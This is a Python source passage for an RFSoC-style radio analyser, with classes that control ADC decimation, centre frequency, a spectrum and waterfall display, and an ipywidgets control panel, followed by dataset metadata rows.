self._widgets['dma_enable'].configure_state(False)
elif key in ['waterfall_enable']:
if self._config['waterfall_enable']:
self._widgets['dma_enable'].configure_state(True)
else:
if not self._config['spectrum_enable']:
self._widgets['dma_enable'].configure_state(False)
def spectrum_analyser(self, config=None):
if config is not None:
self.config = config
return ipw.VBox([ipw.HBox([ipw.VBox([self.analyser.spectrum(),
self.analyser.waterfall(),
ipw.HBox([self._widgets['sample_frequency_label'].get_widget(),
ipw.Label(value=' | '),
self._widgets['resolution_bandwidth_label'].get_widget()],
layout=ipw.Layout(justify_content='flex-end'))
]),
self._accordions['properties']
])
])
def constellation_plot(self):
return ipw.HBox([self._inspector.constellation_plot(),
self._accordions['constellation_properties']
])
class RadioAnalyser():
def __init__(self,
adc_tile,
adc_block,
adc_description,
spectrum_analyser,
decimator):
self._tile = adc_tile
self._block = adc_block
self._spectrum_analyser = spectrum_analyser
self._decimator = decimator
self._adc_description = adc_description
@property
def centre_frequency(self):
return abs(self._block.MixerSettings['Freq'])
@centre_frequency.setter
def centre_frequency(self, centre_frequency):
nyquist_zone = int(np.ceil(centre_frequency/(self._block.BlockStatus['SamplingFreq']*1e3/2)))
if nyquist_zone == 0:
nyquist_zone = 1
if nyquist_zone != self._block.NyquistZone:
self._block.NyquistZone = nyquist_zone
if (nyquist_zone % 2) == 0:
self._block.MixerSettings['Freq'] = centre_frequency
else:
self._block.MixerSettings['Freq'] = -centre_frequency
self._spectrum_analyser.centre_frequency = centre_frequency*1e6
self._block.UpdateEvent(1)
@property
def decimation_factor(self):
if self._decimator.decimation_factor > 0:
return self._block.DecimationFactor * self._decimator.decimation_factor
else:
return self._block.DecimationFactor
@decimation_factor.setter
def decimation_factor(self, decimation_factor):
word_lut = [8, 4, 2]
sel = int(np.log2(decimation_factor))
if decimation_factor in [2, 4, 8]:
self._block.DecimationFactor = decimation_factor
self._block.FabRdVldWords = word_lut[sel-1]
self._spectrum_analyser.ssr_packetsize = 0
self._spectrum_analyser.ssr_mode = 4-sel
self._safe_restart()
self._decimator.decimation_factor = 0
self._spectrum_analyser.sample_frequency = self._block.BlockStatus['SamplingFreq']*1e9
self._spectrum_analyser.decimation_factor = decimation_factor
self._spectrum_analyser.ssr_packetsize = int(self._spectrum_analyser.fft_size/8)
elif decimation_factor in [16, 32, 64, 128, 256, 512, 1024, 2048]:
self._block.DecimationFactor = 8
self._block.FabRdVldWords = 2
self._spectrum_analyser.ssr_packetsize = 0
self._spectrum_analyser.ssr_mode = 0
self._safe_restart()
self._decimator.decimation_factor = int(decimation_factor/8)
self._spectrum_analyser.sample_frequency = self._block.BlockStatus['SamplingFreq']*1e9
self._spectrum_analyser.decimation_factor = decimation_factor
self._spectrum_analyser.ssr_packetsize = int(self._spectrum_analyser.fft_size/8)
@property
def number_frames(self):
return self._spectrum_analyser.plot.data_windowsize
@number_frames.setter
def number_frames(self, number_frames):
if number_frames in range(1, 65):
self._spectrum_analyser.plot.data_windowsize = int(number_frames)
@property
def sample_frequency(self):
return self._block.BlockStatus['SamplingFreq']*1e9
@property
def calibration_mode(self):
return self._block.CalibrationMode
@calibration_mode.setter
def calibration_mode(self, calibration_mode):
if calibration_mode in [1, 2]:
self._block.CalibrationMode = calibration_mode
self._safe_restart()
@property
def nyquist_stopband(self):
return self._spectrum_analyser.nyquist_stopband * 100
@nyquist_stopband.setter
def nyquist_stopband(self, nyquist_stopband):
self._spectrum_analyser.nyquist_stopband = nyquist_stopband/100
@property
def fftsize(self):
return self._spectrum_analyser.fft_size
@fftsize.setter
def fftsize(self, fftsize):
self._spectrum_analyser.fft_size = fftsize
@property
def spectrum_type(self):
return self._spectrum_analyser.spectrum_type
@spectrum_type.setter
def spectrum_type(self, spectrum_type):
self._spectrum_analyser.spectrum_type = spectrum_type
@property
def spectrum_units(self):
return self._spectrum_analyser.spectrum_units
@spectrum_units.setter
def spectrum_units(self, spectrum_units):
self._spectrum_analyser.spectrum_units = spectrum_units
@property
def window(self):
return self._spectrum_analyser.window
@window.setter
def window(self, window_type):
self._spectrum_analyser.window = window_type
@property
def spectrum_window(self):
return self._spectrum_analyser.spectrum_window
@property
def height(self):
return self._spectrum_analyser.height
@height.setter
def height(self, height):
self._spectrum_analyser.height = height
@property
def width(self):
return self._spectrum_analyser.width
@width.setter
def width(self, width):
self._spectrum_analyser.width = width
@property
def spectrum_enable(self):
return self._spectrum_analyser.plot.enable_updates
@spectrum_enable.setter
def spectrum_enable(self, enable):
if enable:
self._spectrum_analyser.plot.enable_updates = True
else:
self._spectrum_analyser.plot.enable_updates = False
@property
def waterfall_enable(self):
return self._spectrum_analyser.spectrogram.enable_updates
@waterfall_enable.setter
def waterfall_enable(self, enable):
if enable:
self._spectrum_analyser.spectrogram.enable_updates = True
else:
self._spectrum_analyser.spectrogram.enable_updates = False
@property
def dma_enable(self):
return self._spectrum_analyser.dma_enable
@dma_enable.setter
def dma_enable(self, enable):
if enable:
self._spectrum_analyser.dma_enable = 1
self._spectrum_analyser.timer.start()
else:
self._spectrum_analyser.timer.stop()
self._spectrum_analyser.dma_enable = 0
@property
def update_frequency(self):
return self._spectrum_analyser.update_frequency
@update_frequency.setter
def update_frequency(self, update_frequency):
self._spectrum_analyser.update_frequency = update_frequency
@property
def plotly_theme(self):
return self._spectrum_analyser.plotly_theme
@plotly_theme.setter
def plotly_theme(self, plotly_theme):
self._spectrum_analyser.plotly_theme = plotly_theme
@property
def line_colour(self):
return self._spectrum_analyser.line_colour
@line_colour.setter
def line_colour(self, line_colour):
self._spectrum_analyser.line_colour = line_colour
@property
def line_fill(self):
return self._spectrum_analyser.line_fill
@line_fill.setter
def line_fill(self, line_fill):
self._spectrum_analyser.line_fill = line_fill
@property
def zmin(self):
return self._spectrum_analyser.zmin
@zmin.setter
def zmin(self, zmin):
self._spectrum_analyser.zmin = zmin
@property
def zmax(self):
return self._spectrum_analyser.zmax
@zmax.setter
def zmax(self, zmax):
self._spectrum_analyser.zmax = zmax
@property
def quality(self):
return self._spectrum_analyser.quality
@quality.setter
def quality(self, quality):
self._spectrum_analyser.quality = quality
@property
def post_process(self):
return self._spectrum_analyser.plot.post_process
@post_process.setter
def post_process(self, post_process):
if post_process in ['max', 'min', 'average', 'median']:
self._spectrum_analyser.plot.post_process = post_process
else:
self._spectrum_analyser.plot.post_process = 'none'
@property
def display_max(self):
return self._spectrum_analyser.plot.display_max
@display_max.setter
def display_max(self, display_max):
self._spectrum_analyser.plot.display_max = display_max
@property
def display_min(self):
return self._spectrum_analyser.plot.display_min
@display_min.setter
def display_min(self, display_min):
self._spectrum_analyser.plot.display_min = display_min
@property
def number_max_indices(self):
return self._spectrum_analyser.plot.number_max_indices
@number_max_indices.setter
def number_max_indices(self, number_max_indices):
self._spectrum_analyser.plot.number_max_indices = number_max_indices
@property
def colour_map(self):
return self._spectrum_analyser.spectrogram.cmap
@colour_map.setter
def colour_map(self, colour_map):
self._spectrum_analyser.spectrogram.cmap = colour_map
@property
def spectrogram_performance(self):
return self._spectrum_analyser.spectrogram.ypixel
@spectrogram_performance.setter
def spectrogram_performance(self, performance):
self._spectrum_analyser.spectrogram.ypixel = performance
@property
def ymin(self):
return self._spectrum_analyser.plot.yrange[0]
@ymin.setter
def ymin(self, ymin):
temp_range = list(self._spectrum_analyser.plot.yrange)
temp_range[0] = ymin
self._spectrum_analyser.plot.yrange = tuple(temp_range)
@property
def ymax(self):
return self._spectrum_analyser.plot.yrange[1]
@ymax.setter
def ymax(self, ymax):
temp_range = list(self._spectrum_analyser.plot.yrange)
temp_range[1] = ymax
self._spectrum_analyser.plot.yrange = tuple(temp_range)
@property
def number_min_indices(self):
return self._spectrum_analyser.plot.number_min_indices
@number_min_indices.setter
def number_min_indices(self, number_min_indices):
self._spectrum_analyser.plot.number_min_indices = number_min_indices
@property
def display_ddc_plan(self):
return self._spectrum_analyser.plot.display_ddc_plan
@display_ddc_plan.setter
def display_ddc_plan(self, display_ddc_plan):
self._spectrum_analyser.plot.display_ddc_plan = display_ddc_plan
@property
def ddc_centre_frequency(self):
return self._spectrum_analyser.plot.ddc_centre_frequency*1e-6
@ddc_centre_frequency.setter
def ddc_centre_frequency(self, ddc_centre_frequency):
self._spectrum_analyser.plot.ddc_centre_frequency = ddc_centre_frequency*1e6
self._spectrum_analyser.plot.update_ddc_plan()
@property
def ddc_plan_hd2_db(self):
return self._spectrum_analyser.plot.ddc_plan.hd2_db
@ddc_plan_hd2_db.setter
def ddc_plan_hd2_db(self, hd2_db):
self._spectrum_analyser.plot.ddc_plan.hd2_db = hd2_db
self._spectrum_analyser.plot.update_ddc_plan()
@property
def ddc_plan_hd3_db(self):
return self._spectrum_analyser.plot.ddc_plan.hd3_db
@ddc_plan_hd3_db.setter
def ddc_plan_hd3_db(self, hd3_db):
self._spectrum_analyser.plot.ddc_plan.hd3_db = hd3_db
self._spectrum_analyser.plot.update_ddc_plan()
@property
def ddc_plan_nsd_db(self):
return self._spectrum_analyser.plot.ddc_plan.nsd_db
@ddc_plan_nsd_db.setter
def ddc_plan_nsd_db(self, nsd_db):
self._spectrum_analyser.plot.ddc_plan.nsd_db = nsd_db
self._spectrum_analyser.plot.update_ddc_plan()
@property
def ddc_plan_pll_mix_db(self):
return self._spectrum_analyser.plot.ddc_plan.pll_mix_db
@ddc_plan_pll_mix_db.setter
def ddc_plan_pll_mix_db(self, pll_mix_db):
self._spectrum_analyser.plot.ddc_plan.pll_mix_db = pll_mix_db
self._spectrum_analyser.plot.update_ddc_plan()
@property
def ddc_plan_off_spur_db(self):
return self._spectrum_analyser.plot.ddc_plan.off_spur_db
@ddc_plan_off_spur_db.setter
def ddc_plan_off_spur_db(self, off_spur_db):
self._spectrum_analyser.plot.ddc_plan.off_spur_db = off_spur_db
self._spectrum_analyser.plot.update_ddc_plan()
@property
def ddc_plan_tis_spur_db(self):
return self._spectrum_analyser.plot.ddc_plan.tis_spur_db
@ddc_plan_tis_spur_db.setter
def ddc_plan_tis_spur_db(self, tis_spur_db):
self._spectrum_analyser.plot.ddc_plan.tis_spur_db = tis_spur_db
self._spectrum_analyser.plot.update_ddc_plan()
@property
def dma_status(self):
return self._spectrum_analyser.dma_status
def spectrum(self):
return self._spectrum_analyser.plot.get_plot()
def waterfall(self):
return self._spectrum_analyser.spectrogram.get_plot()
def _safe_restart(self):
tile_number = self._adc_description[0]
self._tile.ShutDown()
running = self._tile._parent.IPStatus['ADCTileStatus'][tile_number]['PowerUpState']
while running:
time.sleep(0.1)
running = self._tile._parent.IPStatus['ADCTileStatus'][tile_number]['PowerUpState']
self._tile.StartUp()
running = self._tile._parent.IPStatus['ADCTileStatus'][tile_number]['PowerUpState']
while not running:
time.sleep(0.1)
running = self._tile._parent.IPStatus['ADCTileStatus'][tile_number]['PowerUpState']
def _create_mmio_property(idx):
def _get(self):
return self._spectrum_analyser.plot.display_ddc_plan[idx]
def _set(self, value):
if value:
self._spectrum_analyser.plot.display_ddc_plan[idx] = True
else:
self._spectrum_analyser.plot.display_ddc_plan[idx] = False
self._spectrum_analyser.plot.update_ddc_plan()
return property(_get, _set)
for idx, name in enumerate(_freq_planner_props):
setattr(RadioAnalyser, name, _create_mmio_property(idx))
class RadioAnalyserGUI():
def __init__(self,
adc_tile,
adc_block,
adc_description,
spectrum_analyser,
decimator):
self._widgets = {}
self._accordions = {}
self._running_update = False
self._update_que = []
self._stopped = False
self._runtime_status = {'spectrum_enable' : False, 'waterfall_enable' : False}
self.analyser = RadioAnalyser(adc_tile=adc_tile,
adc_block=adc_block,
adc_description=adc_description,
spectrum_analyser=spectrum_analyser,
decimator=decimator)
self._config = {'centre_frequency' : 819,
'nyquist_stopband' : 80,
'decimation_factor' : self.analyser.decimation_factor,
'calibration_mode' : self.analyser.calibration_mode,
'fftsize' : 2048,
'spectrum_type' : self.analyser.spectrum_type,
'spectrum_units' : self.analyser.spectrum_units,
'window' : 'hanning',
'height' : self.analyser.height,
'spectrum_enable' : self.analyser.spectrum_enable,
'waterfall_enable' : self.analyser.waterfall_enable,
'dma_enable' : self.analyser.dma_enable,
'update_frequency' : 10,
'plotly_theme' : self.analyser.plotly_theme,
'line_colour' : self.analyser.line_colour,
'zmin' : self.analyser.zmin,
'zmax' : self.analyser.zmax,
'quality' : self.analyser.quality,
'width' : self.analyser.width,
'post_process' : 'average',
'number_frames' : 6,
'display_max' : False,
'display_min' : False,
'number_max_indices' : 1,
'number_min_indices' : 1,
'colour_map' : self.analyser.colour_map,
'spectrogram_performance' : 4,
'ymin' : self.analyser.ymin,
'ymax' : self.analyser.ymax,
'enable_rx_alias' : False,
'enable_rx_image' : False,
'enable_hd2' : False,
'enable_hd2_image' : False,
'enable_hd3' : False,
'enable_hd3_image' : False,
'enable_pll_mix_up' : False,
'enable_pll_mix_up_image' : False,
'enable_pll_mix_down' : False,
'enable_pll_mix_down_image' : False,
'ddc_centre_frequency' : 0,
'ddc_plan_hd2_db' : self.analyser.ddc_plan_hd2_db,
'ddc_plan_hd3_db' : self.analyser.ddc_plan_hd3_db,
'ddc_plan_nsd_db' : self.analyser.ddc_plan_nsd_db,
'ddc_plan_pll_mix_db' : self.analyser.ddc_plan_pll_mix_db,
'ddc_plan_off_spur_db' : self.analyser.ddc_plan_off_spur_db,
'ddc_plan_tis_spur_db' : self.analyser.ddc_plan_tis_spur_db}
self._initialise_frontend()
@property
def config(self):
return self._config
@config.setter
def config(self, config_dict):
self._update_config(config_dict)
def start(self):
self.config = {'spectrum_enable' : self._runtime_status['spectrum_enable'],
'waterfall_enable' : self._runtime_status['waterfall_enable']}
self._stopped = False
def stop(self):
if not self._stopped:
self._runtime_status.update({'spectrum_enable' : self._config['spectrum_enable'],
'waterfall_enable' : self._config['waterfall_enable']})
self.config = {'spectrum_enable' : False,
'waterfall_enable' : False}
self._stopped = True
def _initialise_frontend(self):
self._widgets.update({'ddc_centre_frequency' :
FloatText(callback=self._update_config,
value=self._config['ddc_centre_frequency'],
min_value=0,
max_value=self.analyser._block.BlockStatus['SamplingFreq']*1e3,
step=1,
dict_id='ddc_centre_frequency',
description='Centre Frequency (MHz):')})
self._widgets.update({'ddc_plan_hd2_db' :
FloatText(callback=self._update_config,
value=self._config['ddc_plan_hd2_db'],
min_value=-300,
max_value=300,
step=1,
dict_id='ddc_plan_hd2_db',
description='HD2 (dB)')})
self._widgets.update({'ddc_plan_hd3_db' :
FloatText(callback=self._update_config,
value=self._config['ddc_plan_hd3_db'],
min_value=-300,
max_value=300,
step=1,
dict_id='ddc_plan_hd3_db',
description='HD3 (dB)')})
self._widgets.update({'ddc_plan_nsd_db' :
FloatText(callback=self._update_config,
value=self._config['ddc_plan_nsd_db'],
min_value=-300,
max_value=300,
step=1,
dict_id='ddc_plan_nsd_db',
description='NSD (dBFs/Hz)')})
self._widgets.update({'ddc_plan_pll_mix_db' :
FloatText(callback=self._update_config,
value=self._config['ddc_plan_pll_mix_db'],
min_value=-300,
max_value=300,
step=1,
dict_id='ddc_plan_pll_mix_db',
description='PLL Ref Mixing (dB)')})
self._widgets.update({'ddc_plan_off_spur_db' :
FloatText(callback=self._update_config,
value=self._config['ddc_plan_off_spur_db'],
min_value=-300,
max_value=300,
step=1,
dict_id='ddc_plan_off_spur_db',
description='Offset Spur (dB)')})
self._widgets.update({'ddc_plan_tis_spur_db' :
FloatText(callback=self._update_config,
value=self._config['ddc_plan_tis_spur_db'],
min_value=-300,
max_value=300,
step=1,
dict_id='ddc_plan_tis_spur_db',
description='TI Spur (dB)')})
for idx, freq_prop in enumerate(_freq_planner_props):
self._widgets.update({freq_prop :
CheckBox(callback=self._update_config,
description=_freq_planner_desc[idx],
value=self._config[freq_prop],
indent=False,
layout_width='150px',
dict_id=freq_prop)})
self._widgets.update({'decimation_factor' :
DropDown(callback=self._update_config,
options=[2, 4, 8, 16, 32, 64, 128, 256, 512, 1024, 2048],
value=self._config['decimation_factor'],
dict_id='decimation_factor',
description='Decimation Factor:')})
self._widgets.update({'spectrum_type' :
DropDown(callback=self._update_config,
options=[('Power Spectrum'),
('Power Spectral Density')],
value=self._config['spectrum_type'],
dict_id='spectrum_type',
description='Spectrum Type:',
description_width='100px')})
self._widgets.update({'spectrum_units' :
DropDown(callback=self._update_config,
options=[('dBW'),
('dBm')],
value=self._config['spectrum_units'],
dict_id='spectrum_units',
description='Spectrum Units:',
description_width='100px')})
self._widgets.update({'post_process' :
DropDown(callback=self._update_config,
options=[('None', 'none'),
('Maximum Hold', 'max'),
('Minimum Hold', 'min'),
('Running Average', 'average'),
('Running Median', 'median')],
value=self._config['post_process'],
dict_id='post_process',
description='Post Processing:',
description_width='100px')})
self._widgets.update({'fftsize' :
DropDown(callback=self._update_config,
options=[64, 128, 256, 512, 1024, 2048, 4096, 8192],
value=4096,
dict_id='fftsize',
description = 'FFT Size:')})
self._widgets.update({'calibration_mode' :
DropDown(callback=self._update_config,
options=[('1 (Fs/2 ≤ ±30%)', 1),
('2 (Fs/2 > ±30%)', 2)],
value=self._config['calibration_mode'],
dict_id='calibration_mode',
description='Calibration Mode:')})
self._widgets.update({'window' :
DropDown(callback=self._update_config,
options=[('Rectangular', 'rectangular'),
('Bartlett', 'bartlett'),
('Blackman', 'blackman'),
('Hamming', 'hamming'),
('Hanning', 'hanning')],
value='rectangular',
dict_id='window',
description='')})
self._widgets.update({'plotly_theme' :
DropDown(callback=self._update_config,
options=[('Seaborn', 'seaborn'),
('Simple White', 'simple_white'),
('Plotly', 'plotly'),
('Plotly White', 'plotly_white'),
('Plotly Dark', 'plotly_dark')],
value='plotly',
dict_id='plotly_theme',
description='Plotly Theme:')})
self._widgets.update({'colour_map' :
DropDown(callback=self._update_config,
options=[('Grey' , 'gray'),
('Spring' , 'spring'),
('Summer' , 'summer'),
('Autumn' , 'autumn'),
('Winter' , 'winter'),
('Cool' , 'cool'),
('Hot' , 'hot'),
('Copper' , 'copper'),
('Rainbow', 'rainbow'),
('Jet' , 'jet')],
value='gray',
dict_id='colour_map',
description='Colour Map:',
description_width='100px')})
self._widgets.update({'line_colour' :
DropDown(callback=self._update_config,
options=list(mcolors.CSS4_COLORS),
value='white',
dict_id='line_colour',
description='Line Colour:')})
self._widgets.update({'line_fill' :
DropDown(callback=self._update_config,
options=list(mcolors.CSS4_COLORS),
value='lightpink',
dict_id='line_fill',
description='Line Fill:')})
self._widgets.update({'spectrogram_performance' :
DropDown(callback=self._update_config,
options=[('Low', 8),
('Medium', 4),
('High', 2)],
value=2,
dict_id='spectrogram_performance',
description='Resolution:',
description_width='100px')})
self._widgets.update({'number_max_indices' :
IntText(callback=self._update_config,
value=self._config['number_max_indices'],
min_value=1,
max_value=64,
step=1,
dict_id='number_max_indices',
description='Number of Maximums:')})
self._widgets.update({'number_min_indices' :
IntText(callback=self._update_config,
value=self._config['number_min_indices'],
min_value=1,
max_value=64,
step=1,
dict_id='number_min_indices',
description='Number of Minimums:')})
self._widgets.update({'number_frames' :
FloatText(callback=self._update_config,
value=self._config['number_frames'],
min_value=1,
max_value=64,
step=1,
dict_id='number_frames',
description='Number Frames:',
description_width='100px')})
self._widgets.update({'ymin' :
FloatText(callback=self._update_config,
value=self._config['ymin'],
min_value=-300,
max_value=300,
step=1,
dict_id='ymin',
description='Y-Low (dB):',
description_width='100px')})
self._widgets.update({'ymax' :
FloatText(callback=self._update_config,
value=self._config['ymax'],
min_value=-300,
max_value=300,
step=1,
dict_id='ymax',
description='Y-High (dB):',
description_width='100px')})
self._widgets.update({'centre_frequency' :
FloatText(callback=self._update_config,
value=self._config['centre_frequency'],
min_value=0,
max_value=self.analyser._block.BlockStatus['SamplingFreq']*1e3,
step=1,
dict_id='centre_frequency',
description='Centre Frequency (MHz):')})
self._widgets.update({'nyquist_stopband' :
FloatText(callback=self._update_config,
value=self._config['nyquist_stopband'],
min_value=50,
max_value=100,
step=1,
dict_id='nyquist_stopband',
description='Nyquist Stopband (%):')})
self._widgets.update({'height' :
FloatText(callback=self._update_config,
value=self._config['height'],
min_value=200,
max_value=2160,
step=1,
dict_id='height',
description='Plot Height (Px):')})
self._widgets.update({'width' :
FloatText(callback=self._update_config,
value=self._config['width'],
min_value=400,
max_value=4096,
step=1,
dict_id='width',
description='Plot Width (Px):')})
#self._widgets.update({'update_frequency' :
# FloatText(callback=self._update_config,
# value=self._config['update_frequency'],
# min_value=5,
# max_value=12,
# step=1,
# dict_id='update_frequency',
# description='Update Frequency:')})
self._widgets.update({'update_frequency' :
DropDown(callback=self._update_config,
options=[('Low', 5),
('Medium', 10),
('High', 15)],
value=5,
dict_id='update_frequency',
description='Plot Performance:')})
self._widgets.update({'zmin' :
FloatText(callback=self._update_config,
value=self._config['zmin'],
min_value=-300,
max_value=300,
step=1,
dict_id='zmin',
description='Z-Low (dB):',
description_width='100px')})
self._widgets.update({'zmax' :
FloatText(callback=self._update_config,
value=self._config['zmax'],
min_value=-300,
max_value=300,
step=1,
dict_id='zmax',
description='Z-High (dB):',
description_width='100px')})
self._widgets.update({'quality' :
FloatText(callback=self._update_config,
value=self._config['quality'],
min_value=80,
max_value=100,
step=1,
dict_id='quality',
description='Quality (%):',
description_width='100px')})
self._widgets.update({'dma_enable' :
Button(callback=self._update_config,
description_on = 'On',
description_off = 'Off',
state=False,
dict_id='dma_enable')})
self._widgets.update({'spectrum_enable' :
Button(callback=self._update_config,
description_on = 'On',
description_off = 'Off',
state=False,
dict_id='spectrum_enable')})
self._widgets.update({'waterfall_enable' :
Button(callback=self._update_config,
description_on = 'On',
description_off = 'Off',
state=False,
dict_id='waterfall_enable')})
self._widgets.update({'sample_frequency_label' :
Label(value=str((self.analyser.sample_frequency/self.analyser.decimation_factor)*1e-6),
svalue='Sample Frequency: ',
evalue=' MHz',
dict_id='sample_frequency_label')})
self._widgets.update({'resolution_bandwidth_label' :
Label(value=str(((self.analyser.sample_frequency/self.analyser.decimation_factor)/ \
self.analyser.fftsize)*1e-3),
svalue='Frequency Resolution: ',
evalue=' kHz',
dict_id='resolution_bandwidth_label')})
self._widgets.update({'display_max' :
CheckBox(callback=self._update_config,
description='Display Maximum',
value=self._config['display_max'],
dict_id='display_max')})
self._widgets.update({'display_min' :
CheckBox(callback=self._update_config,
description='Display Minimum',
value=self._config['display_min'],
dict_id='display_min')})
self._window_plot = go.FigureWidget(layout={'hovermode' : 'closest',
'height' : 225,
'width' : 300,
'margin' : {
't':0, 'b':20, 'l':0, 'r':0
},
'showlegend' : False,
},
data=[{
'x': np.arange(self.analyser.fftsize),
'y': np.ones(self.analyser.fftsize),
'line':{
'color' : 'palevioletred',
'width' : 2
},
'fill' : 'tozeroy',
'fillcolor' : 'rgba(128, 128, 128, 0.5)'
}])
self._accordions.update({'properties' :
ipw.Accordion(children=[ipw.HBox(
[ipw.VBox([ipw.Label(value='Spectrum Analyzer: ', layout=ipw.Layout(width='150px')),
ipw.Label(value='Spectrogram: ', layout=ipw.Layout(width='150px'))]),
ipw.VBox([self._widgets['spectrum_enable'].get_widget(),
self._widgets['waterfall_enable'].get_widget()])],
layout=ipw.Layout(justify_content='space-around')),
ipw.VBox([self._widgets['centre_frequency'].get_widget(),
self._widgets['decimation_factor'].get_widget(),
self._widgets['fftsize'].get_widget()]),
ipw.VBox([self._widgets['post_process'].get_widget(),
self._widgets['number_frames'].get_widget(),
self._widgets['spectrum_type'].get_widget(),
self._widgets['spectrum_units'].get_widget(),
self._widgets['ymin'].get_widget(),
self._widgets['ymax'].get_widget()]),
ipw.VBox([ipw.Label(value='Experimental Control Panel'),
self._widgets['ddc_centre_frequency'].get_widget(),
ipw.HBox([
ipw.VBox([self._widgets[_freq_planner_props[i]].get_widget() for i in range(0,int(len(_freq_planner_props)/2))]),
ipw.VBox([self._widgets[_freq_planner_props[i]].get_widget() for i in range(int(len(_freq_planner_props)/2),len(_freq_planner_props))])
])
]),
ipw.VBox([self._widgets['spectrogram_performance'].get_widget(),
self._widgets['colour_map'].get_widget(),
self._widgets['zmin'].get_widget(),
self._widgets['zmax'].get_widget()]),
ipw.VBox([self._window_plot,
self._widgets['window'].get_widget()]),
ipw.VBox([self._widgets['nyquist_stopband'].get_widget(),
self._widgets['height'].get_widget(),
self._widgets['width'].get_widget(),
self._widgets['update_frequency'].get_widget()])
])})
""" Frequency Planner Widgets
ipw.VBox([self._widgets['ddc_centre_frequency'].get_widget(),
self._widgets['ddc_plan_hd2_db'].get_widget(),
self._widgets['ddc_plan_hd3_db'].get_widget(),
self._widgets['ddc_plan_pll_mix_db'].get_widget(),
self._widgets['ddc_plan_off_spur_db'].get_widget(),
self._widgets['ddc_plan_tis_spur_db'].get_widget(),
self._widgets['ddc_plan_nsd_db'].get_widget(),
ipw.HBox([
ipw.VBox([self._widgets[_freq_planner_props[i]].get_widget() for i in range(0,int(len(_freq_planner_props)/2))]),
ipw.VBox([self._widgets[_freq_planner_props[i]].get_widget() for i in range(int(len(_freq_planner_props)/2),len(_freq_planner_props))])
])
]),
"""
self._accordions['properties'].set_title(0, 'System')
self._accordions['properties'].set_title(1, 'Receiver')
self._accordions['properties'].set_title(2, 'Spectrum Analyzer')
self._accordions['properties'].set_title(3, 'Frequency Planner')
self._accordions['properties'].set_title(4, 'Spectrogram')
self._accordions['properties'].set_title(5, 'Window Settings')
self._accordions['properties'].set_title(6, 'Plot Settings')
self._update_config(self._config)
def _update_config(self, config_dict):
for key in config_dict.keys():
if key not in self._config:
raise KeyError(''.join(['Key ', str(key), ' not in dictionary.']))
self._config.update(config_dict)
self._update_que.append(config_dict.keys())
if not self._running_update:
self._running_update = True
self._update_frontend()
def _update_frontend(self):
if self._update_que:
plot_running = self._config['spectrum_enable']
self.analyser.spectrum_enable = False
while self.analyser.dma_status != 32:
time.sleep(0.1)
while self._running_update:
keys = self._update_que.pop(0)
for key in keys:
if key in self._config:
if key in ['centre_frequency', 'decimation_factor', 'quality']:
self._widgets['waterfall_enable'].value = False
self.analyser.waterfall_enable = False
setattr(self.analyser, key, self._config[key])
self._widgets[key].value = self._config[key]
if key in ['plotly_theme', 'line_colour', 'decimation_factor',
'spectrum_enable', 'waterfall_enable']:
self._update_widgets(key)
if key in ['fftsize', 'window']:
self._update_figurewidgets(key)
self._update_textwidgets()
time.sleep(0.2)
if not self._update_que:
self.analyser.spectrum_enable = plot_running
self._running_update = False
self._running_update = False
def _update_textwidgets(self):
self._widgets['sample_frequency_label'].value = str((self.analyser.sample_frequency/ \
self.analyser.decimation_factor)*1e-6)
self._widgets['resolution_bandwidth_label'].value = str(((self.analyser.sample_frequency/ \
self.analyser.decimation_factor)/self.analyser.fftsize)*1e-3)
def _update_figurewidgets(self, key):
if key in ['fftsize']:
self._window_plot.data[0].x = np.arange(self.analyser.fftsize)
self._window_plot.data[0].y = self.analyser.spectrum_window
elif key in ['window']:
self._window_plot.data[0].y = self.analyser.spectrum_window
def _update_widgets(self, key):
if key in ['line_colour']:
self._window_plot.data[0].line.color = self._config['line_colour']
self._widgets['dma_enable'].button_colour = self._config['line_colour']
self._widgets['spectrum_enable'].button_colour = self._config['line_colour']
self._widgets['waterfall_enable'].button_colour = self._config['line_colour']
elif key in ['plotly_theme']:
self._window_plot.layout.template = self._config['plotly_theme']
elif key in ['decimation_factor']:
step_list = [10, 1, 1, 1, 0.1, 0.1, 0.1, 0.01, 0.01, 0.01, 0.001]
self._widgets['centre_frequency'].step = step_list[int(np.log2(self._config['decimation_factor']) - 1)]
elif key in ['spectrum_enable']:
if self._config['spectrum_enable']:
self._widgets['dma_enable'].configure_state(True)
else:
if not self._config['waterfall_enable']:
self._widgets['dma_enable'].configure_state(False)
elif key in ['waterfall_enable']:
if self._config['waterfall_enable']:
self._widgets['dma_enable'].configure_state(True)
else:
if not self._config['spectrum_enable']:
self._widgets['dma_enable'].configure_state(False)
def spectrum_analyser(self, config=None):
if config is not None:
self.config = config
return ipw.VBox([ipw.HBox([ipw.VBox([self.analyser.spectrum(),
self.analyser.waterfall(),
ipw.HBox([self._widgets['sample_frequency_label'].get_widget(),
ipw.Label(value=' | '),
self._widgets['resolution_bandwidth_label'].get_widget()],
layout=ipw.Layout(justify_content='flex-end'))
]),
self._accordions['properties']
])
])
| 48.322751
| 199
| 0.459807
| 9,086
| 109,596
| 5.191503
| 0.039842
| 0.076998
| 0.090736
| 0.05088
| 0.968327
| 0.963706
| 0.960611
| 0.960611
| 0.959805
| 0.956583
| 0
| 0.015685
| 0.453767
| 109,596
| 2,268
| 200
| 48.322751
| 0.772154
| 0.019928
| 0
| 0.953463
| 0
| 0
| 0.098522
| 0.007504
| 0
| 0
| 0
| 0
| 0
| 1
| 0.108225
| false
| 0
| 0.004329
| 0.04816
| 0.16829
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
43e529ebbf87fb8335c2af1dc2416a93a566acfd
| 22,179
|
py
|
Python
|
sdk/python/pulumi_oci/databasemanagement/managed_database_group.py
|
EladGabay/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 5
|
2021-08-17T11:14:46.000Z
|
2021-12-31T02:07:03.000Z
|
sdk/python/pulumi_oci/databasemanagement/managed_database_group.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-09-06T11:21:29.000Z
|
2021-09-06T11:21:29.000Z
|
sdk/python/pulumi_oci/databasemanagement/managed_database_group.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
